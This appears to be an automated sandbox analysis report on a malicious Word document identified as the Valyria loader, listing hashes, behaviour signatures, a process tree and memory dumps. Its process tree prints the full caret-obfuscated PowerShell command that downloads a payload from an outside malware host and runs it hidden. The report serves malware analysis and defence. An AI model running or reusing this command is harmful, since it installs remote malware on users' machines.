Analysis

  • max time kernel
    146s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    13/04/2022, 14:51

General

  • Target

    31520.doc

  • Size

    87KB

  • MD5

    2e1df76d290a94565ab02741e34fd53e

  • SHA1

    81639fcd12723d8d29cac7af5e42c1576c7915dc

  • SHA256

    c5f9b97bb1a209f6a2cebf0e7cfd205befe6b69192d4c6549efb8ec4f946a64e

  • SHA512

    193349e44552e876773f12db9e442e87fc018e2786704bcd257b01513fee9b9981bc2d393384d026cfb23da88faa72b7660b0524d3522629c2e55bf604594ecd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://newyeargoka.top/read.php?f=0.dat

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Valyria

    Malicious Word document which is a loader for other malware.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\31520.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "p^Ow^ers^hELl.^eXe -^eX^ecUT^ionp^Ol^icy^ by^pa^S^s^ -^NoPrOFIle ^-^W^I^ND^oWS^tY^l^e hI^d^dEN (new-OBJ^ect^ ^SySt^e^m.^net^.WEB^c^LiEN^T^).DoW^N^LOAd^fILe('http://newyeargoka.top/read.php?f=0.dat','C:\Users\Admin\AppData\Roaming.EXE');^ST^A^rt-pr^oC^eSs^ 'C:\Users\Admin\AppData\Roaming.EXe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwershELl.eXe -eXecUTionpOlicy bypaSs -NoPrOFIle -WINDoWStYle hIddEN (new-OBJect SyStem.net.WEBcLiENT).DoWNLOAdfILe('http://newyeargoka.top/read.php?f=0.dat','C:\Users\Admin\AppData\Roaming.EXE');STArt-proCeSs 'C:\Users\Admin\AppData\Roaming.EXe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4108
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 440 -p 2540 -ip 2540
    1⤵
      PID:3724
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2540 -s 2012
      1⤵
      • Program crash
      PID:3484
    • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
      "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:860

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4108-141-0x00000178597C0000-0x00000178597E2000-memory.dmp

      Filesize

      136KB

    • memory/4108-142-0x00007FF8696D0000-0x00007FF86A191000-memory.dmp

      Filesize

      10.8MB

    • memory/4108-143-0x0000017859800000-0x0000017859802000-memory.dmp

      Filesize

      8KB

    • memory/4108-144-0x0000017859803000-0x0000017859805000-memory.dmp

      Filesize

      8KB

    • memory/4108-145-0x0000017859806000-0x0000017859808000-memory.dmp

      Filesize

      8KB

    • memory/4812-134-0x00007FF855430000-0x00007FF855440000-memory.dmp

      Filesize

      64KB

    • memory/4812-135-0x00007FF855430000-0x00007FF855440000-memory.dmp

      Filesize

      64KB

    • memory/4812-136-0x00007FF855430000-0x00007FF855440000-memory.dmp

      Filesize

      64KB

    • memory/4812-137-0x00007FF855430000-0x00007FF855440000-memory.dmp

      Filesize

      64KB

    • memory/4812-138-0x00007FF855430000-0x00007FF855440000-memory.dmp

      Filesize

      64KB